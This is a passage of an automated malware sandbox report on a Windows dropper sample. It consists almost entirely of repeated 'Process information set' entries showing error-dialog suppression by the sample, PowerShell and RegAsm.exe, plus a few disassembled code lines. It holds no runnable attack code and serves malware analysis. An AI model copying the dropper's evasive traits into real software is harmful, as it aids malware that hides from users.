Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0493C710 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0493ACC0 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0493CA10 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0493B504 push E801005Eh; ret

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
